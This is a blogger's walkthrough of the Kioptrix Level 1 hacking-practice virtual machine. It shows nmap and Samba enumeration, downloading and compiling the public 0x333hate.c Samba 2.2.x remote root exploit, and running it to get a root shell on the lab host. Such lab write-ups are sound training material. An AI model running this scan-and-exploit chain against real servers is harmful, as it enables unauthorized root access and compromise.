Kioptrix hacking challenge: Part 1
Kioptrix is another set of virtual machines that are intended to be hacked into. As of this writing there are currently four Kioptrix challenges. Each one increases in difficulty and is a good start for someone new to penetration testing. Towards the end of last April, I started playing around with it and documented the steps to exploit it. Kioptrix 1 is geared towards the beginner, and is one of the easiest challenges out there.
The Kioptrix virtual machines can be downloaded from http://www.kioptrix.com/blog/?page_id=135
I identified the IP address of the virtual machine using netdiscover and launched a port scan against it.
# nmap -sS -T4 -A 192.168.1.144 Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-23 20:26 EDT Nmap scan report for 192.168.1.144 Host is up (0.00048s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) |_sshv1: Server supports SSHv1 | ssh-hostkey: 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) |_1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 1024/tcp status |_ 100024 1 1024/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-09-26 09:32:06 |_Not valid after: 2010-09-26 09:32:06 | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_sslv2: server still supports SSLv2 |_http-title: Test Page for the Apache Web Server on Red Hat Linux 1024/tcp open status (status V1) 1 (rpc #100024) MAC Address: 00:0C:29:46:F7:8C (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop Host script results: |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> TRACEROUTE HOP RTT ADDRESS 1 0.48 ms 192.168.1.144
nmap found a webserver, so I pointed my browser to http://192.168.1.144 and found an Apache test page. I fired up nikto and DirBuster in the background to scan the website for any vulnerabilities and hidden directories. In the meantime, I decided to look into the open Samba port. nmap didn’t print out the Samba version, so I decided to probe it a bit. I used nmblookup and smbclient
# nmblookup -A 192.168.1.144 Looking up status of 192.168.1.144 KIOPTRIX <00> - B <ACTIVE> KIOPTRIX <03> - B <ACTIVE> KIOPTRIX <20> - B <ACTIVE> ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> MYGROUP <00> - <GROUP> B <ACTIVE> MYGROUP <1d> - B <ACTIVE> MYGROUP <1e> - <GROUP> B <ACTIVE> MAC Address = 00-00-00-00-00-00 # smbclient -L //KIOPTRIX -I 192.168.1.144 Enter root's password: Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] Sharename Type Comment --------- ---- ------- cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport IPC$ IPC IPC Service (Samba Server) ADMIN$ Disk IPC Service (Samba Server) Anonymous login successful Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] Server Comment --------- ------- KIOPTRIX Samba Server Workgroup Master --------- ------- MYGROUP KIOPTRIX
I was able to get a listing of the shares without a password. Using smbclient I identified that the server was running Samba 2.2.1a. I headed over to Google and searched for Samba 2.2.1 exploits. This revealed a SANS paper about a Samba exploit called 0x333hate.c. A Google search for 0x333hate.c yielded a copy of the exploit, hosted at SecurityFocus.com
I downloaded the file and compiled it.
# wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c --2012-04-23 22:34:02-- http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c Resolving downloads.securityfocus.com... 184.108.40.206 Connecting to downloads.securityfocus.com|220.127.116.11|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 6514 (6.4K) [text/plain] Saving to: `0x333hate.c' 100%[=================================================================================================================>] 6,514 --.-K/s in 0.1s 2012-04-23 22:34:03 (62.5 KB/s) - `0x333hate.c' saved [6514/6514] # gcc 0x333hate.c 0x333hate.c: In function ‘usage’: 0x333hate.c:91: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c: In function ‘exploit’: 0x333hate.c:126: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c:130: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c:134: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c:139: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c:142: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c: In function ‘owned’: 0x333hate.c:201: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c:210: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c:220: warning: incompatible implicit declaration of built-in function ‘exit’ 0x333hate.c: In function ‘main’: 0x333hate.c:252: warning: format ‘%x’ expects type ‘unsigned int’, but argument 3 has type ‘long unsigned int’
Some warning messages, but no errors. I ran the exploit to see what would happen:
# ./a.out [~] 0x333hate => samba 2.2.x remote root exploit [~] [~] coded by c0wboy ~ www.0x333.org [~] Usage : ./a.out [-t target] [-p port] [-h] -t target to attack -p samba port (default 139) -h display this help
Pretty simple, takes only one argument which is the IP address of the target. I tried it again and it gave me a root shell instantly:
# ./a.out -t 192.168.1.144 [~] 0x333hate => samba 2.2.x remote root exploit [~] [~] coded by c0wboy ~ www.0x333.org [~] [-] connecting to 192.168.1.144:139 [-] stating bruteforce [-] testing 0xbfffffff [-] testing 0xbffffdff [-] testing 0xbffffbff [-] testing 0xbffff9ff [-] testing 0xbffff7ff Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown uid=0(root) gid=0(root) groups=99(nobody)
At this point the game was over. I explored the system a little bit and found a congratulatory message from the creator:
cat mbox From root Sat Sep 26 11:42:10 2009 Return-Path: <[email protected]> Received: (from [email protected]) by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831 for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400 Date: Sat, 26 Sep 2009 11:42:10 -0400 From: root <[email protected]> Message-Id: <[email protected]> To: [email protected] Subject: About Level 2 Status: RO If you are reading this, you got root. Congratulations. Level 2 won't be as easy...
This challenge was basically just a scan and exploit against a vulnerable target. Although that seems easy, that’s exactly how a lot of servers are compromised. It’s not too difficult to find servers running certain vulnerable services and exploits that target them.